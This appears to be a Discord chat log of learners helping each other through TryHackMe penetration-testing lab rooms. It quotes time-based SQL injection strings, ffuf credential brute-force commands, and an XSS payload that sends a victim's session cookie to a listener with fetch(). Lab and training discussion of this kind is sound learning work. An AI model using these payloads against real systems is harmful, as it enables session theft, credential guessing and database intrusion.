Someone needs to have a serious look at this task lmfao

Hmm, 644 instead of 600, dunno if its intentional haha

@steel nymph I have admin page after editing cookies a bit. But can't seem to find anything useful here?

It's most definetly not

The questions for that task are messed up too

Anyone done the time based sql one in https://tryhackme.com/room/sqlinjectionlm I'm hitting a blank. Can't seem to find a column name?

What are you trying?

||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name='users' and column_name like 'a%';--||

You're using the wrong information_schema

You can't find columns if you're looking looking tables

ooooooooooooooooooooohhhh

thanks

Np

Me too someone, help please a cant finish the path because of this

think i'm dtuck again sorry, trying to get the username. is ||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 from users where username like 'z%';--|| the right syntax?

ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.117.78/customers/login -fc 200

posted this in task 3 which is the given command

I changed it to match my username txt file I made from the previous task

I seem to be getting no results with this

https://ibb.co/TPkKkyC

here is the screenshot

Any help with first challenge File Inclusion task 8?

Looks like it

i dunno what i changed, but now ||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name='users' and column_name like 'username%' and column_name!='password%' and column_name!='id%';--|| is working

@raw bolt have you verified the contents of usernames.txt ?

yeah when I did the command in task 2 I did >> usernames.txt

but then I just went in there and deleted everything but just the names. Still nothing

https://ibb.co/k8Yb97Q

hmm... I had some issues at this point as well... just checked my notes and your screen shot looks right, I did reference my usernames.txt ./usernames.txt. But I would think you would get an ffuf error if it couldn't find the file

got it now, big thanks 🙂

Gave +1 Rep to @drifting drum

Its wierd

and there are not walkthroughs online for this course.

checking my notes to see if there are any other hints I can offer

ok ty

does my command look right? Its in the first screenshot I linked.

it does. I know I had issues when I mis-typed the Content-Type

https://tenor.com/view/dogs-sad-major-disappointment-disappointed-sigh-gif-16342223

🙂

Was that a hint?

Cause im stumped

lol

no, dogs make me laugh

Anyone have trouble getting the last flag on the XSS challenge?

I'm firing that vm back up and checking it out @raw bolt

I appreciate ya

Alright, I'm back again. I'm doing Linux PrivEsc task 10 (nfs). I'm getting an error after trying to execute the compiled script. Anyone know what's up?

I copied it exactly how it's written in the task

@raw bolt this is what I have an it works
ffuf -w ./valid_username.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.63.83/customers/login -fc 200

I just ran the command you used substituting IP addr and filename, and it worked for me.

still not working

I don't know what the heck im doing wrong

maybe try killing the VM and starting a new one?

ok

im not getting how a copy paste command isnt working lol

same

Is the wordlist path correct for your machine?

I think ffuf would throw an error if that was the case, but worth a look

Im currently working out of root

spun up another VM and samething

@raw bolt This is the path for my machine which doesn't match the one directed ->>>> /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt

must be right because it spins up an error when I change the name of the file in the command

any special chars in the usernames?? what do you get with cat ./usernames.txt?

tried it with and without ./ still nothing

in the screenshot it looks like you opened the file in a text editor. if you use cat to get the contents do you see any additional characters?

Welll.....interesting thing

nothing happens

hmm... try running the ffuf without the -fc 200

see what all the results are

https://ibb.co/5jfsqQK

Has anyone done the XSS room in the JR penetration path?

@raw bolt is the usernames.txt file in your current path? and if it is it seems like there is nothing in it

yes iti s

this was the command from task 2

maybe I did it wrong the way I outputted it to the file?

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.196.158/customers/signup -mr "username already exists" >> username.txt

do you have 2 files in that dir? one names usernames.txt and the other username.txt?

this one i mean

nope

what if you manually recreate the usernames.txt file?

https://ibb.co/c8QYDrX

I did this instead

I did this originally and then just took out all the crap

getting nothing from cat username.txt is what concerns me. you should get the contents of the file

refer to the other screenshot

i redid step 2

thats where im at now

@blazing arrow https://ibb.co/c8QYDrX

and you removed the "crap".. got it

not yet

should i?

yup

the file should have one username per line

You guys having issues getting it to read the usernames file? I found a weird workaround for that if anyone can't get it to work

when I edit it now nothing appears when I cat it

please do share cause I've been on this task for WAY to long

what are you using to edit the file?

just opening it up in the text editor

What I did was went a found the wordlists already on the VM and changed the data inside one of those to the like 4 usernames you need. Then set that file location in place of saying usernames.txt in the command. (idk why it worked, but it did)

@raw bolt try using nano

ok

I agree. I really like nano. Super easy to use, too

sometimes text editors can leave unexpected characters

bro im about to skip this

now nothing cats when I edit it

like wtf

its so dumb

and yes i used nano

Could I DM you?

sure

last thing to try... create a new file, enter the usernames that you know are good , one per line, then re-run your ffuf command referencing your new file.

well holy fucking shit

that did it

wait

I spoke too soon

i got an error

no

I got it

making a new file did the trick

which is FKIN DUMB

oh nice, that didn't work for me, but glad you got it sorted out

thank you for everyones help

How do I give you props @blazing arrow

@raw bolt @him and say thank you

Gave +1 Rep to @raw bolt

lol

@blazing arrow thank you

Gave +1 Rep to @blazing arrow

@raw bolt I'm glad you resolved it

how to redem those ticket

On your profile there is a ticket tab you can go to. If you have 3 of a ticket you can redeem it

guys
I'm so lost and just braindead
how the freak do you do LFI for the last challenge, it literally filters out all special characters and numbers

I tried putting it in hex, base64, maybe I'll even try md5 😂

that is we need to have all three Pentester Title voucher to reedem it

?

Correct

Oh Okay thanks mate

No problem

I got one EJPT voucher

@modest arch what if you change the method on the form? Get or Post?

are you talking about the 3rd challenge? cause that def helped for the 1st one when it was doing get instead, but I will double check

yup, it helps on the 3rd challenge as well

Yo byrdman have you done XSS yet?

thanks man, I had it going through burp and everything so I'm surprised I didn't catch it

I haven't yet, I'm only a few days in

Damn. I can't find anyone thats on it.

@modest arch 🤙

I'm about to call it a day. but I'm plowing through and love helping. @crimson lark hopefully I can help you soon

Whenever you get to the end let me know lol.

@crimson lark I'm on it now, and it isn't accepting the cookie. Ran through it like 20 times.

Are you trying to view the staff session cookie?

yes

I swear it doesn't work. I tried for like 2 hours today and i know my code works because I can prompt my response.

The cookie that it is sending is your own cookie that is why it doesn't accept it. Most likely you click into the "ticket" and that is why your getting a callback

I can't get the "staff" cookie to send for the life of me

Agreed; I used both methods it suggests.

I don't even know how to escalate this, but it drives me crazy its not completed

what challenge is that for

XSS

This is so weird, for LFI I can't get the 3rd challenge to respond right to a post request

hey @spark sleet @crimson lark, try removing the extra space between two closing parentheses. document.cookie)" ")

it worked for me

are you kidding me

You still having issues with that?

did it work for you?

waiting for the callback right now

your putting it in the comments right? Not the subject line?

yes, make sure to remove the { } too. just wanted to make sure.

||Are you using curl?||

i used request catcher

This the code. ||</textarea><script>fetch('http://0.0.0.0:4444?cookie=' + btoa(document.cookie));</script>||

yes, opening < is missing. and try with request catcher.

That was a typo.

I just got back and heard people were having issues with getting a response

Script port should be the same as the NC specified right

port can be the any, as long as its the same on the script and what you setup

@lavish rose , i tried to use the request catcher as well, and only get DNS entries.

are you opening the ticket after creating it?

No because that sends back my own session cookie